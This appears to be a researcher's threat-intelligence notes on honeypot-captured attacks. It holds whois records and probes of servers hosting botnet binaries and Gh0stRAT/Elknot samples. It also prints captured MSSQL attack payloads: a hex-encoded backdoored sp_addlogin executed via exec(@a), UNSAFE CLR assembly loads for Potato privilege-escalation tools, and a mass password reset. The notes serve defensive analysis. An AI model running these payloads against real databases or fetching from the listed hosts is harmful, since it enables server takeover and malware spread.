source: RIPE # Filtered
org: ORG-DOI2-RIPE
$ curl -i http://cfvnqmikm7qp1bg00010kw4569dqk941x.oast.me
HTTP/1.1 200 OK
Content-Type: text/html; charset=utf-8
Server: oast.me
X-Interactsh-Version: 1.0.7
Date: Thu, 02 Mar 2023 08:39:59 GMT
Content-Length: 72
<html><head></head><body>x149kqd9654wk01000gb1pq7mkimqnvfc</body></html>
This seems like either a dead link or an advanced attack to insert this string into the execSync() function being called. Can’t see any logical decode sequence, could be a pointer to a previous infection that would create a function or binary.
MSSQL log:
\x01\x00\x10\x00\x00\x00\x01\x00declare @a varchar(8000) set @a=0x6372656174652070726F6365647572652073705F6164646C6F67696E20406C6F67696E616D65207379736E616D652C40706173737764207379736E616D65203D204E756C6C2C406465666462207379736E616D65203D20276D6173746572272C406465666C616E6775616765207379736E616D65203D204E756C6C2C407369642076617262696E61727928313629203D204E756C6C202C40656E63727970746F7074207661726368617228323029203D204E756C6C20415320736574206E6F636F756E74206F6E204465636C617265204072657420696E7420494620286E6F742069735F737276726F6C656D656D6265722827736563757269747961646D696E2729203D20312920626567696E20646263632061756469746576656E7420283130342C20312C20302C20406C6F67696E616D652C204E554C4C2C204E554C4C2C20407369642920726169736572726F722831353234372C2D312C2D31292072657475726E2028312920656E6420454C534520626567696E20646263632061756469746576656E7420283130342C20312C20312C20406C6F67696E616D652C204E554C4C2C204E554C4C2C20407369642920656E642073657420696D706C696369745F7472616E73616374696F6E73206F6666204946202840407472616E636F756E74203E20302920626567696E20726169736572726F722831353030322C2D312C2D312C2773705F6164646C6F67696E27292072657475726E2028312920656E6420657865637574652040726574203D2073705F76616C69646E616D6520406C6F67696E616D65206966202840726574203C3E2030292072657475726E20283129206966202863686172696E64657828275C272C20406C6F67696E616D6529203E20302920626567696E20726169736572726F722831353030362C2D312C2D312C406C6F67696E616D65292072657475726E2028312920656E642069662028406C6F67696E616D65203D2027736127206F72206C6F77657228406C6F67696E616D652920696E2028277075626C696327292920626567696E20726169736572726F722831353430352C202D31202C2D312C20406C6F67696E616D65292072657475726E2028312920656E64206966206578697374732873656C656374202A2066726F6D206D61737465722E64626F2E7379736C6F67696E73207768657265206C6F67696E6E616D65203D20406C6F67696E616D652920626567696E20726169736572726F722831353032352C2D312C2D312C406C6F67696E616D65292072657475726E2028312920656E642049462064625F69642840646566646229204953204E554C4C20626567696E20726169736572726F722831353031302C2D312C2D312C406465666462292072657475726E2028312920656E642049462028406465666C616E6775616765204953204E4F54204E756C6C2920626567696E20457865637574652040726574203D2073705F76616C69646C616E6720406465666C616E6775616765204946202840726574203C3E2030292072657475726E2028312920656E6420454C534520626567696E2073656C65637420406465666C616E6775616765203D206E616D652066726F6D206D61737465722E64626F2E7379736C616E677561676573207768657265206C616E676964203D20404064656661756C745F6C616E67696420696620406465666C616E6775616765206973206E756C6C2073656C65637420406465666C616E6775616765203D204E2775735F656E676C6973682720656E6420696620282840736964204953204E4F54204E756C6C2920616E642028646174616C656E677468284073696429203C3E203136292920626567696E20726169736572726F722831353431392C2D312C2D31292072657475726E2028312920656E6420656C73652069662040736964206973206E756C6C2073656C6563742040736964203D206E657769642829206966202873757365725F736E616D65284073696429204953204E4F54204E756C6C2920626567696E20726169736572726F722831353433332C2D312C2D31292072657475726E2028312920656E64206465636C61726520407873746174757320736D616C6C696E742073656C656374204078737461747573203D20322069662040656E63727970746F7074206973206E756C6C2073656C6563742040706173737764203D20707764656E637279707428407061737377642920656C73652069662040656E63727970746F7074203D2027736B69705F656E6372797074696F6E5F6F6C642720626567696E2073656C656374204078737461747573203D204078737461747573207C2030783830302C2040706173737764203D20636F6E76657274287379736E616D652C20636F6E766572742876617262696E617279283330292C20636F6E766572742876617263686172283330292C204070617373776429292920656E6420656C73652069662040656E63727970746F7074203C3E2027736B69705F656E6372797074696F6E2720626567696E20726169736572726F722831353630302C2D312C2D312C2773705F6164646C6F67696E27292072657475726E203120656E6420424547494E205452414E20494E5345525420494E544F206D61737465722E64626F2E737973786C6F67696E732056414C554553284E554C4C2C20407369642C2040787374617475732C206765746461746528292C206765746461746528292C20406C6F67696E616D652C20636F6E766572742876617262696E61727928323536292C2040706173737764292C64625F69642840\x01\x01\x02x\x00\x00\x02\x006465666462292C20406465666C616E6775616765292069662040406572726F72203C3E2030206F72206578697374732873656C656374202A2066726F6D206D61737465722E64626F2E737973786C6F67696E73207769746820286E6F6C6F636B29207768657265207372766964204953204E554C4C20616E64206E616D65203D20406C6F67696E616D6520616E6420736964203C3E20407369642920626567696E20726169736572726F722831353032352C2D312C2D312C406C6F67696E616D652920524F4C4C4241434B205452414E2072657475726E2028312920656E6420434F4D4D4954205452414E20657865632827757365206D6173746572206772616E7420616C6C20746F206E756C6C272920726169736572726F722831353239382C2D312C2D31292072657475726E2020283029 exec(@a)
I haven’t done enough of these because I find them boring and repetitive. Decoded this turns into:
create procedure sp_addlogin @loginame sysname,@passwd sysname = Null,@defdb sysname = 'master',@deflanguage sysname = Null,@sid varbinary(16) = Null ,@encryptopt varchar(20) = Null AS set nocount on Declare @ret int IF (not is_srvrolemember('securityadmin') = 1) begin dbcc auditevent (104, 1, 0, @loginame, NULL, NULL, @sid) raiserror(15247,-1,-1) return (1) end ELSE begin dbcc auditevent (104, 1, 1, @loginame, NULL, NULL, @sid) end set implicit_transactions off IF (@@trancount > 0) begin raiserror(15002,-1,-1,'sp_addlogin') return (1) end execute @ret = sp_validname @loginame if (@ret <> 0) return (1) if (charindex('\\', @loginame) > 0) begin raiserror(15006,-1,-1,@loginame) return (1) end if (@loginame = 'sa' or lower(@loginame) in ('public')) begin raiserror(15405, -1 ,-1, @loginame) return (1) end if exists(select * from master.dbo.syslogins where loginname = @loginame) begin raiserror(15025,-1,-1,@loginame) return (1) end IF db_id(@defdb) IS NULL begin raiserror(15010,-1,-1,@defdb) return (1) end IF (@deflanguage IS NOT Null) begin Execute @ret = sp_validlang @deflanguage IF (@ret <> 0) return (1) end ELSE begin select @deflanguage = name from master.dbo.syslanguages where langid = @@default_langid if @deflanguage is null select @deflanguage = N'us_english' end if ((@sid IS NOT Null) and (datalength(@sid) <> 16)) begin raiserror(15419,-1,-1) return (1) end else if @sid is null select @sid = newid() if (suser_sname(@sid) IS NOT Null) begin raiserror(15433,-1,-1) return (1) end declare @xstatus smallint select @xstatus = 2 if @encryptopt is null select @passwd = pwdencrypt(@passwd) else if @encryptopt = 'skip_encryption_old' begin select @xstatus = @xstatus | 0x800, @passwd = convert(sysname, convert(varbinary(30), convert(varchar(30), @passwd))) end else if @encryptopt <> 'skip_encryption' begin raiserror(15600,-1,-1,'sp_addlogin') return 1 end BEGIN TRAN INSERT INTO master.dbo.sysxlogins VALUES(NULL, @sid, @xstatus, getdate(), getdate(), @loginame, convert(varbinary(256), @passwd),db_id(@\x01\x01\x02x\x00\x00\x02\x00defdb), @deflanguage) if @@error <> 0 or exists(select * from master.dbo.sysxlogins with (nolock) where srvid IS NULL and name = @loginame and sid <> @sid) begin raiserror(15025,-1,-1,@loginame) ROLLBACK TRAN return (1) end COMMIT TRAN exec('use master grant all to null') raiserror(15298,-1,-1) return (0)
There are plenty of simple MSSQL exploits recorded, but the obfuscated ones tend to be slightly more interesting. Other obfuscation techniques include the “CREATE ASSEMBLY” command with obfuscated text or previously downloaded local files:
\x01\x01\x00a\x00\x00\x01\x00CREATE ASSEMBLY [NtApiDotNet] FROM \x27C:\x5cusers\x5cpublic\x5cNt.rar\x27 WITH PERMISSION_SET = UNSAFE '
They also seem to like potatoes:
\x01\x01\x00~\x00\x00\x01\x00CREATE PROCEDURE [dbo].[BadExecCommand20]AS EXTERNAL NAME [BadPotatoCLR20].[BadStoredProcedures20].[BadExecCommand20]
\x01\x01\x00\xc2\x00\x00\x01\x00DROP PROCEDURE [dbo].[ExecCommand35] DROP PROCEDURE [dbo].[SqlStoredProcedure35] DROP ASSEMBLY [SweetPotatoClr35] DROP ASSEMBLY [Stored
Procedures35] DROP ASSEMBLY [SqlStoredProcedure35]
Changing password example:
\x01\x01\x05a\x00\x00\x01\x00exec sp_password Null,\x275Mssq!@#4567.; \x27,\x27users\x27 exec sp_password Null,\x275Mssq!@#4567.; \x27,\x27usera\x27 exec sp_password Null,\x275Mssq!@#4567.; \x27,\x27ps\x27 exec sp_password Null,\x275Mssq!@#4567.; \x27,\x27mssqla\x27 exec sp_password Null,\x275Mssq!@#4567.; \x27,\x27sql\x27 exec sp_password Null,\x275Mssq!@#4567.; \x27,\x27web\x27 exec sp_password Null,\x275Mssq!@#4567.; \x27,\x27wwo\x27 exec sp_password Null,\x275Mssq!@#4567.; \x27,\x27wq\x27 exec sp_password Null,\x275Mssq!@#4567.; \x27,\x27so\x27 exec sp_password Null,\x275Mssq!@#4567.; \x27,\x27gaibian\x27 exec sp_password Null,\x275Mssq!@#4567.; \x27,\x27xxa\x27 exec sp_password Null,\x275Mssq!@#4567.; \x27,\x27win7\x27 exec sp_password Null,\x275Mssq!@#4567.; \x27,\x27vice\x27 exec sp_password Null,\x275Mssq!@#4567.; \x27,\x27sz\x27 exec sp_password Null,\x275Mssq!@#4567.; \x27,\x27ss\x27 exec sp_password Null,\x275Mssq!@#4567.; \x27,\x27se\x27 exec sp_password Null,\x275Mssq!@#4567.; \x27,\x27gd\x27 exec sp_password Null,\x275Mssq!@#4567.; \x27,\x27syn\x27 exec sp_password Null,\x275Mssq!@#4567.; \x27,\x27sasa\x27 exec sp_password Null,\x275Mssq!@#4567.; \x27,\x27count\x27 exec sp_password Null,\x275Mssq!@#4567.; \x27,\x27sysaid\x27 exec sp_password Null,\x275Mssq!@#4567.; \x27,\x27web\x27 exec sp_password Null,\x275Mssq!@#4567.; \x27,\x27websa\x27 exec sp_password Null,\x275Mssq!@#4567.; \x27,\x27sql\x27 exec sp_password Null,\x275Mssq!@#4567.; \x27,\x276door\x27 exec sp_password Null,\x275Mssq!@#4567.; \x27,\x27nanshou1433\x27 exec sp_password Null,\x275Mssq!@#4567.; \x27,\x27nanshou\x27 exec sp_password Null,\x275Mssq!@#4567.; \x27,\x27shitou\x27 exec sp_password Null,\x275Mssq!@#4567.; \x27,\x27nanshou\x27
inetnum: 79.110.62.0 - 79.110.62.255
netname: Serverion_BV-NET
abuse-c: SB27731-RIPE
org: ORG-DCB8-RIPE
country: NL
admin-c: SB27731-RIPE
mnt-lower: mnt-nl-descapital-1
mnt-routes: mnt-nl-descapital-1
mnt-domains: mnt-nl-descapital-1
tech-c: SB27731-RIPE
status: ASSIGNED PA
mnt-by: MNT-NETERRA
created: 2022-06-10T07:58:45Z
last-modified: 2022-09-26T14:30:13Z
source: RIPE
organisation: ORG-DCB8-RIPE
org-name: Des Capital B.V.
country: NL
org-type: LIR
address: Krammer 8
address: 3232HE
address: Brielle
address: NETHERLANDS
phone: +31851308338
phone: +13023803902
admin-c: AA35882-RIPE
tech-c: TA7409-RIPE
abuse-c: AR60082-RIPE
mnt-ref: mnt-nl-descapital-1
mnt-ref: RELCOMGROUP-EXT-MNT
mnt-ref: FREENET-MNT
mnt-ref: MNT-NETERRA
mnt-ref: MNT-MAYAK
mnt-ref: bg-mcreative-1-mnt
mnt-ref: mnt-bg-mconsulting15-1
mnt-ref: bg-mconsulting-1-mnt
mnt-ref: MNT-MCONSULTING
mnt-ref: mnt-bg-ccomp-1
mnt-by: RIPE-NCC-HM-MNT
mnt-by: mnt-nl-descapital-1
created: 2020-03-17T15:00:52Z
last-modified: 2022-09-26T13:22:34Z
source: RIPE # Filtered
mnt-ref: AZERONLINE-MNT
mnt-ref: interlir-mnt
$ curl -i http://79.110.62.192
HTTP/1.1 200 OK
Date: Fri, 10 Mar 2023 20:59:03 GMT
Server: Apache/2.4.29 (Ubuntu)
Last-Modified: Tue, 14 Feb 2023 17:56:40 GMT
ETag: "2aa6-5f4acaf950965"
Accept-Ranges: bytes
Content-Length: 10918
Vary: Accept-Encoding
Content-Type: text/html
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<!--
Modified from the Debian original for Ubuntu
Last updated: 2016-11-16
See: https://launchpad.net/bugs/1288690
-->
<head>
<meta http-equiv="Content-Type" content="text/html; charset=UTF-8" />
<title>Apache2 Ubuntu Default Page: It works</title>
<style type="text/css" media="screen">
* {
margin: 0px 0px 0px 0px;
padding: 0px 0px 0px 0px;
}
Using previous architecture names, from just one NIGarm filename the following was found:
NIGarm: ELF 32-bit LSB executable, ARM, version 1 (ARM), statically linked, stripped
NIGarm5: ELF 32-bit LSB executable, ARM, version 1 (ARM), statically linked, stripped
NIGarm6: ELF 32-bit LSB executable, ARM, EABI4 version 1 (SYSV), statically linked, stripped
NIGarm7: ELF 32-bit LSB executable, ARM, EABI4 version 1 (SYSV), statically linked, stripped
NIGm68k: ELF 32-bit MSB executable, Motorola m68k, 68020, version 1 (SYSV), statically linked, stripped
NIGmips: ELF 32-bit MSB executable, MIPS, MIPS-I version 1 (SYSV), statically linked, stripped
NIGmpsl: ELF 32-bit LSB executable, MIPS, MIPS-I version 1 (SYSV), statically linked, stripped
NIGppc: ELF 32-bit MSB executable, PowerPC or cisco 4500, version 1 (SYSV), statically linked, stripped
NIGsh4: ELF 32-bit LSB executable, Renesas SH, version 1 (SYSV), statically linked, stripped
NIGspc: ELF 32-bit MSB executable, SPARC, version 1 (SYSV), statically linked, stripped
NIGx86: ELF 64-bit LSB executable, x86-64, version 1 (SYSV), statically linked, stripped
inetnum: 128.199.0.0 - 128.199.255.255
netname: DigitalOcean
descr: DigitalOcean, LLC
country: US
admin-c: PT7353-RIPE
tech-c: PT7353-RIPE
status: LEGACY
mnt-by: digitalocean
mnt-domains: digitalocean
mnt-routes: digitalocean
created: 2004-07-20T10:29:14Z
last-modified: 2020-03-31T14:17:22Z
source: RIPE
org: ORG-DOI2-RIPE
organisation: ORG-DOI2-RIPE
org-name: DigitalOcean, LLC
country: US
org-type: LIR
address: 101 Avenue of the Americas, 10th Floor
address: New York
address: 10013
address: UNITED STATES
phone: +1 888 890 6714
mnt-ref: digitalocean
mnt-ref: RIPE-NCC-HM-MNT
mnt-by: RIPE-NCC-HM-MNT
mnt-by: digitalocean
abuse-c: AD10778-RIPE
language: EN
created: 2012-11-29T14:59:01Z
last-modified: 2020-12-16T13:24:44Z
source: RIPE # Filtered
$ curl -i http://128.199.134.42/
HTTP/1.1 200 OK
Date: Fri, 10 Mar 2023 20:57:44 GMT
Server: Apache/2.4.6 (CentOS)
Last-Modified: Wed, 08 Mar 2023 14:16:29 GMT
ETag: "0-5f6642c9c6c51"
Accept-Ranges: bytes
Content-Length: 0
Content-Type: text/html; charset=UTF-8
$ curl -i http://128.199.134.42/596a96cc7bf9108cd896f33c44aedc8a/
HTTP/1.1 200 OK
Date: Fri, 10 Mar 2023 20:57:26 GMT
Server: Apache/2.4.6 (CentOS)
Last-Modified: Wed, 08 Mar 2023 14:16:29 GMT
ETag: "0-5f6642c9c7421"
Accept-Ranges: bytes
Content-Length: 0
Content-Type: text/html; charset=UTF-8
inetnum: 194.55.224.0 - 194.55.224.255
netname: SERVERION_BV-NET
org: ORG-DCB8-RIPE
country: NL
admin-c: EA7138-RIPE
tech-c: EA7138-RIPE
abuse-c: AR63171-RIPE
status: ASSIGNED PA
mnt-by: MNT-NETERRA
mnt-routes: lir-us-delis-1-MNT
mnt-domains: lir-us-delis-1-MNT
mnt-routes: mnt-nl-descapital-1
mnt-domains: mnt-nl-descapital-1
created: 2023-02-23T09:09:04Z
last-modified: 2023-02-23T10:08:54Z
source: RIPE
organisation: ORG-DCB8-RIPE
org-name: Des Capital B.V.
country: NL
org-type: LIR
address: Krammer 8
address: 3232HE
address: Brielle
address: NETHERLANDS
$ curl -i http://194.55.224.203
HTTP/1.1 200 OK
Date: Tue, 14 Mar 2023 18:07:18 GMT
Server: Apache/2.4.6 (CentOS)
Last-Modified: Fri, 10 Mar 2023 17:18:35 GMT
ETag: "8-5f68ef39190b0"
Accept-Ranges: bytes
Content-Length: 8
Content-Type: text/html; charset=UTF-8
i love u
$ whois 100.43.163.61
[Querying whois.arin.net]
[Redirected to vault.krypt.com:4321]
[Querying vault.krypt.com]
[Unable to connect to remote host]
$ whois 74.222.172.110
[Querying whois.arin.net]
[Redirected to vault.krypt.com:4321]
[Querying vault.krypt.com]
[Unable to connect to remote host]
vault.krypt.com. 280 IN A 74.222.172.110
usb4.verichains.co. 456 IN A 100.43.163.61
$ wget http://100.43.163.61/jaws
--2023-03-14 13:09:31-- http://100.43.163.61/jaws
Connecting to 100.43.163.61:80... connected.
HTTP request sent, awaiting response... 301 Moved Permanently
Location: https://usb4.verichains.co/jaws [following]
--2023-03-14 13:09:31-- https://usb4.verichains.co/jaws
Resolving usb4.verichains.co (usb4.verichains.co)... 100.43.163.61
Connecting to usb4.verichains.co (usb4.verichains.co)|100.43.163.61|:443... connected.
HTTP request sent, awaiting response... 404 Not Found
2023-03-14 13:09:32 ERROR 404: Not Found.
$ curl -i https://usb4.verichains.co
HTTP/1.1 200 OK
Server: nginx/1.18.0
Date: Tue, 14 Mar 2023 18:11:34 GMT
Content-Type: text/html; charset=utf-8
Content-Length: 612
Last-Modified: Tue, 14 Mar 2023 12:10:06 GMT
Connection: keep-alive
ETag: "6410641e-264"
Accept-Ranges: bytes
<!DOCTYPE html>
<html>
<head>
<title>Welcome to nginx!</title>
Say what? I’m going to guess they cleaned up an infection here.
inetnum: 45.81.243.0 - 45.81.243.255
netname: SERVERION_BV-NET
org: ORG-DCB8-RIPE
country: NL
admin-c: EA7138-RIPE
tech-c: EA7138-RIPE
abuse-c: AR63171-RIPE
status: ASSIGNED PA
mnt-by: MNT-NETERRA
mnt-routes: lir-us-delis-1-MNT
mnt-routes: mnt-nl-descapital-1
mnt-domains: lir-us-delis-1-MNT
mnt-domains: mnt-nl-descapital-1
created: 2023-02-23T09:05:51Z
last-modified: 2023-02-23T10:05:21Z
source: RIPE
organisation: ORG-DCB8-RIPE
org-name: Des Capital B.V.
country: NL
org-type: LIR
address: Krammer 8
address: 3232HE
address: Brielle
address: NETHERLANDS
$ curl -i http://45.81.243.34
HTTP/1.1 200 OK
Date: Thu, 30 Mar 2023 23:49:40 GMT
Server: Apache/2.4.6 (CentOS) PHP/5.4.16
Last-Modified: Mon, 20 Mar 2023 15:58:27 GMT
ETag: "0-5f756ff5e8711"
Accept-Ranges: bytes
Content-Length: 0
Content-Type: text/html; charset=UTF-8
$ curl -i http://45.81.243.34/a/
HTTP/1.1 200 OK
Date: Fri, 07 Apr 2023 09:22:36 GMT
Server: Apache/2.4.6 (CentOS) PHP/5.4.16
Transfer-Encoding: chunked
Content-Type: text/html;charset=ISO-8859-1
Index of /a
[ICO] Name Last modified Size Description
═════════════════════════════════════════════════════════════════════
[PARENTDIR] Parent Directory -
[ ] 76d32be0.sh 2023-03-17 07:03 9.8K
[ ] 77676d32be0.sh 2023-03-20 19:49 9.8K
[ ] abcdb0fa4b8db0333367..> 2023-03-17 06:28 81K
[ ] abcdb0fa4b8db0333367..> 2023-03-17 06:28 33K
[ ] abcdb0fa4b8db0333367..> 2023-03-17 06:28 29K
[ ] abcdb0fa4b8db0333367..> 2023-03-17 06:28 37K
[ ] abcdb0fa4b8db0333367..> 2023-03-17 06:28 57K
[ ] abcdb0fa4b8db0333367..> 2023-03-17 06:28 34K
[ ] abcdb0fa4b8db0333367..> 2023-03-17 06:28 78K
[ ] abcdb0fa4b8db0333367..> 2023-03-17 06:28 34K
[ ] abcdb0fa4b8db0333367..> 2023-03-17 06:28 35K
[ ] abcdb0fa4b8db0333367..> 2023-03-17 06:28 31K
[ ] abcdb0fa4b8db0333367..> 2023-03-17 06:28 73K
[ ] abcdb0fa4b8db0333367..> 2023-03-17 06:28 81K
[ ] abcdb0fa4b8db0333367..> 2023-03-17 06:28 32K
[DIR] b/ 2023-03-20 12:21 -
[ ] bot.arm7 2023-03-20 12:21 57K
[ ] bot.mips 2023-03-20 12:21 34K
[ ] db0fa4b8db0333367e9b..> 2023-03-17 06:26 81K
[ ] db0fa4b8db0333367e9b..> 2023-03-17 06:26 33K
[ ] db0fa4b8db0333367e9b..> 2023-03-17 06:26 29K
[ ] db0fa4b8db0333367e9b..> 2023-03-17 06:26 37K
[ ] db0fa4b8db0333367e9b..> 2023-03-17 06:26 57K
[ ] db0fa4b8db0333367e9b..> 2023-03-17 06:26 34K
[ ] db0fa4b8db0333367e9b..> 2023-03-17 06:26 78K
[ ] db0fa4b8db0333367e9b..> 2023-03-17 06:26 34K
[ ] db0fa4b8db0333367e9b..> 2023-03-17 06:26 35K
[ ] db0fa4b8db0333367e9b..> 2023-03-17 06:26 31K
[ ] db0fa4b8db0333367e9b..> 2023-03-17 06:26 73K
[ ] db0fa4b8db0333367e9b..> 2023-03-17 06:26 81K
[ ] db0fa4b8db0333367e9b..> 2023-03-17 06:26 32K
[ ] wget.sh 2023-03-20 19:53 9.8K
[ ] wwgget.sh 2023-03-20 19:53 9.8K
═════════════════════════════════════════════════════════════════════
inetnum: 85.217.144.0 - 85.217.144.255
netname: SERVERION_BV-NET
org: ORG-DCB8-RIPE
country: NL
admin-c: EA7138-RIPE
tech-c: EA7138-RIPE
abuse-c: AR63171-RIPE
status: ASSIGNED PA
mnt-by: MNT-NETERRA
mnt-routes: lir-us-delis-1-MNT
mnt-domains: lir-us-delis-1-MNT
mnt-routes: mnt-nl-descapital-1
mnt-domains: mnt-nl-descapital-1
created: 2023-02-23T09:09:04Z
last-modified: 2023-02-23T10:08:54Z
source: RIPE
organisation: ORG-DCB8-RIPE
org-name: Des Capital B.V.
country: NL
org-type: LIR
address: Krammer 8
address: 3232HE
address: Brielle
address: NETHERLANDS
$ curl -i http://85.217.144.250
HTTP/1.1 403 Forbidden
Date: Thu, 30 Mar 2023 23:46:34 GMT
Server: Apache/2.4.6 (CentOS)
Last-Modified: Thu, 16 Oct 2014 13:20:58 GMT
ETag: "1321-5058a1e728280"
Accept-Ranges: bytes
Content-Length: 4897
Content-Type: text/html; charset=UTF-8
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd"><html><head>
<meta http-equiv="content-type" content="text/html; charset=UTF-8">
<title>Apache HTTP Server Test Page powered by CentOS</title>
<meta http-equiv="Content-Type" content="text/html; charset=UTF-8">
<!-- Bootstrap -->
<link href="/noindex/css/bootstrap.min.css" rel="stylesheet">
<link rel="stylesheet" href="noindex/css/open-sans.css" type="text/css" />
Index of /hiddenbin
[ICO] Name Last modified Size Description
══════════════════════════════════════════════════════════════
[PARENTDIR] Parent Directory -
[ ] boatnet.arc 2023-03-05 00:57 105K
[ ] boatnet.arm 2023-03-05 00:57 22K
[ ] boatnet.arm5 2023-03-05 00:57 18K
[ ] boatnet.arm6 2023-03-05 00:57 27K
[ ] boatnet.arm7 2023-03-05 00:57 46K
[ ] boatnet.m68k 2023-03-05 00:57 54K
[ ] boatnet.mips 2023-03-05 00:57 23K
[ ] boatnet.mpsl 2023-03-05 00:57 24K
[ ] boatnet.ppc 2023-03-05 00:57 21K
[ ] boatnet.sh4 2023-03-05 00:57 49K
[ ] boatnet.spc 2023-03-05 00:57 57K
[ ] boatnet.x86 2023-03-05 00:57 21K
══════════════════════════════════════════════════════════════
inetnum: 43.142.0.0 - 43.142.255.255
netname: TENCENT-CN
descr: Tencent Cloud Computing (Beijing) Co., Ltd
descr: Floor 6, Yinke Building, 38 Haidian St, Haidian District
country: CN
org: ORG-TCCC1-AP
admin-c: TCA15-AP
tech-c: TCA15-AP
status: ALLOCATED PORTABLE
abuse-c: AT992-AP
remarks: --------------------------------------------------------
remarks: To report network abuse, please contact mnt-irt
remarks: For troubleshooting, please contact tech-c and admin-c
remarks: Report invalid contact via www.apnic.net/invalidcontact
remarks: --------------------------------------------------------
mnt-by: APNIC-HM
mnt-lower: MAINT-TENCENT-CN
mnt-routes: MAINT-TENCENT-CN
mnt-irt: IRT-TENCENT-CN
last-modified: 2021-12-14T05:38:16Z
source: APNIC
irt: IRT-TENCENT-CN
address: Floor 6, Yinke Building, 38 Haidian St, Haidian District, Beijing Beijing 100080
e-mail: tencent_noc@tencent.com
abuse-mailbox: tencent_noc@tencent.com
admin-c: TCA15-AP
tech-c: TCA15-AP
auth: # Filtered
remarks: tencent_noc@tencent.com was validated on 2023-03-16
mnt-by: MAINT-COMSENZ1-CN
last-modified: 2023-03-16T07:06:37Z
source: APNIC
HFS /
Messages
User
Login
Folder
[IMG] Home
0 folders, 2 files, 1.6 Mbytes
Search
________________ [ go ]
Where to search (X) this folder and sub-folders
( ) this folder only
( ) entire server
Select
All Invert Mask
0 items selected
Actions
Archive Get list
Server information HttpFileServer 2.3k
Server time: 2023/3/31 8:19:38
Server uptime: (28 days) 12:33:35
Name.extension Size Timestamp Hits
[ ] [IMG] LinuxTF 1.3 MB 2023/3/28 23:21:01 4
[ ] [IMG] Server.exe 287.0 KB 2023/3/28 18:38:35 2275
Interesting one…
LinuxTF: ELF 32-bit LSB executable, Intel 80386, version 1 (SYSV), statically linked, for GNU/Linux 2.2.5, not stripped
Server.exe: PE32 executable (GUI) Intel 80386, for MS Windows, UPX compressed
LinuxTF: Unix.Trojan.Elknot-2 FOUND
Server.exe: Win.Dropper.Gh0stRAT-7696262-0 FOUND
inetnum: 45.95.146.0 - 45.95.146.255
netname: ALSYCON-CUSTOMERS
org: ORG-AB247-RIPE
descr: Alsycon B.V. | VPS - Dedicated Servers - Colocation
descr: www.alsycon.nl - info@alsycon.nl
country: NL
admin-c: AB39270-RIPE
tech-c: AB39270-RIPE
status: ASSIGNED PA
mnt-by: Alsycon-BV
created: 2019-07-10T10:43:00Z
last-modified: 2020-09-27T15:34:25Z
source: RIPE
organisation: ORG-AB247-RIPE
org-name: Alsycon B.V.
country: NL
org-type: LIR
address: Bruynvisweg 11
address: 1531 AX
address: Wormer
address: NETHERLANDS
phone: +31224712026
abuse-c: ACRO31910-RIPE
mnt-by: RIPE-NCC-HM-MNT
mnt-by: Alsycon-BV
mnt-ref: Alsycon-BV
mnt-ref: SpectraIP
mnt-ref: MNT-HOSTUS
created: 2019-05-13T14:08:46Z
last-modified: 2021-07-28T21:55:27Z
source: RIPE # Filtered
Interesting:
address: Wormer
address: NETHERLANDS
Thinking back to w0rmer…
$ curl -i http://45.95.146.26/
HTTP/1.1 200 OK
Date: Sun, 30 Apr 2023 20:26:12 GMT
Server: Apache/2.4.6 (CentOS)
Last-Modified: Mon, 17 Apr 2023 23:17:18 GMT
ETag: "0-5f990646c86cf"
Accept-Ranges: bytes
Content-Length: 0
Content-Type: text/html; charset=UTF-8
$ curl -i http://45.95.146.26/pedalcheta/
HTTP/1.1 200 OK
Date: Sun, 30 Apr 2023 20:26:29 GMT
Server: Apache/2.4.6 (CentOS)
Last-Modified: Thu, 27 Apr 2023 22:08:53 GMT
ETag: "0-5fa589a1ad34b"
Accept-Ranges: bytes
Content-Length: 0
Content-Type: text/html; charset=UTF-8
$ curl -i http://85.217.144.207
HTTP/1.1 403 Forbidden
Date: Sun, 30 Apr 2023 21:50:05 GMT
Server: Apache/2.4.6 (CentOS)
Last-Modified: Thu, 16 Oct 2014 13:20:58 GMT
ETag: "1321-5058a1e728280"
Accept-Ranges: bytes
Content-Length: 4897
Content-Type: text/html; charset=UTF-8
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd"><html><head>
<meta http-equiv="content-type" content="text/html; charset=UTF-8">
<title>Apache HTTP Server Test Page powered by CentOS</title>
<meta http-equiv="Content-Type" content="text/html; charset=UTF-8">
<!-- Bootstrap -->
<link href="/noindex/css/bootstrap.min.css" rel="stylesheet">
<link rel="stylesheet" href="noindex/css/open-sans.css" type="text/css" />
Index of /bins
[ICO] Name Last modified Size Description
══════════════════════════════════════════════════════════════
[PARENTDIR] Parent Directory -
[ ] ah 2023-04-28 17:39 419
[ ] arm 2023-04-28 17:39 53K
[ ] arm5 2023-04-28 17:39 53K
[ ] arm6 2023-04-28 17:39 63K
[ ] arm7 2023-04-28 17:39 125K
[ ] jklarm 2023-04-28 17:39 53K
[ ] jklarm5 2023-04-28 17:39 53K
[ ] jklarm6 2023-04-28 17:39 63K
[ ] jklarm7 2023-04-28 17:39 125K
[ ] jklm68k 2023-04-28 17:39 53K
[ ] jklmips 2023-04-28 17:39 70K
[ ] jklmpsl 2023-04-28 17:39 71K
[ ] jklppc 2023-04-28 17:39 53K
[ ] jklspc 2023-04-28 17:39 55K
[ ] jklx86 2023-04-28 17:39 49K
[ ] m68k 2023-04-28 17:39 53K
[ ] mips 2023-04-28 17:39 70K
[ ] mpsl 2023-04-28 17:39 71K
[ ] nabarm 2023-04-28 17:39 33K
[ ] nabarm5 2023-04-28 17:39 33K
[ ] nabarm6 2023-04-28 17:39 45K
[ ] nabarm7 2023-04-28 17:39 105K
[ ] nabm68k 2023-04-28 17:39 35K
[ ] nabmips 2023-04-28 17:39 46K
[ ] nabmpsl 2023-04-28 17:39 46K
[ ] nabppc 2023-04-28 17:39 33K
[ ] nabspc 2023-04-28 17:39 37K
[ ] nabx86 2023-04-28 17:39 33K
[ ] ppc 2023-04-28 17:39 53K
[ ] sh 2023-04-28 17:39 419
[ ] spc 2023-04-28 17:39 55K
[ ] u 2023-04-28 17:39 47K
[ ] x86 2023-04-28 17:39 49K
══════════════════════════════════════════════════════════════
ah: ASCII text
arm: ELF 32-bit LSB executable, ARM, version 1 (ARM), statically linked, stripped
arm5: ELF 32-bit LSB executable, ARM, version 1 (ARM), statically linked, stripped
